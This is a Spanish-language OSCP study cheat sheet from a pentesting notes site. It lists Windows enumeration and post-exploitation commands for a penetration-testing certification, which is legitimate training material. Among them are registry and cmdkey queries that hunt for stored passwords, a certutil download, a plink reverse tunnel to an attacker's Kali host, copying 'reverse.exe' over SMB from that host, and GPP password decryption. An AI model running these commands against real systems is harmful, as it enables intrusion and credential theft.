xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Enumeración
  • Funciones básicas
  1. Apuntes y recursos OSCP
  2. Windows

Windows Basics

Enumeración

Enumeración del sistema

systeminfo
systeminfo | findstr /B /C: "OS Name" /C: "OS Version" /C: "System Type"
wmic qfe get Caption, Description, HotFixID, InstalledOn #Muestra actualizaciones del sistema
wmic logicaldisk get caption, description, providername #Muestra discos

Enumeración de usuarios

whoami
whoami /priv
whoami /groups
net user
net user <USUARIO>
net localgroup
net localgroup <GRUPO>

Enumeración de red

ip a
ifconfig
route
ip route
aipconfig
ipconfig /all #Información extendida
arp -a
route print
netstat -ano

Búsqueda de archivos

#CMD
where /r c:\ file.txt
#Powershell
Get-ChildItem -Path C:\Myfolder -Filter file.txt -Recurs

Búsqueda de credenciales

#Valores en el registro que contengan la string “password”
reg query HKLM /f password /t REG_SZ /s
#Listar autologon passwords
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
#Lista contraseñas guardadas
cmdkey /list

Enumeración de antivirus

sc query windefend
sc queryex type= service #Lista servicios activos
netsh advfirewall firewall dump

Enumeración con herramientas automáticas

Funciones básicas

Descarga de archivos

certutil.exe -urlcache -f <URL> <OUTPUT_FILE>

Comprobación de permisos sobre un archivo

accesschk.exe /accepteula -quvw <user> <Ruta absoluta del archivo>

Ejecución de un programa como otro usuario en Powershell

powershell -c "$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<USER>', $password);Start-Process -FilePath "<PROGRAM.EXE>" -Credential $creds"

Windows Port Forwarding

plink.exe -l <KALI_USER> -pw <KALI_USER_PASS> -R <KALI_PORT>:<LOCAL_IP/LOCALHOST_IP>:<LOCAL_PORT> <KALI_IP>

Transferencia de archivos mediante smb

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . #Kali
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe #Windows

Desencriptado GPP

gpp-decrypt "<hash>"
AnteriorWindowsSiguienteWindows Privesc

Última actualización hace 1 año

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
Release Release refs/heads/master 20230108 · carlospolop/PEASS-ngGitHub
GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next GenerationGitHub
Logo
Logo
Logo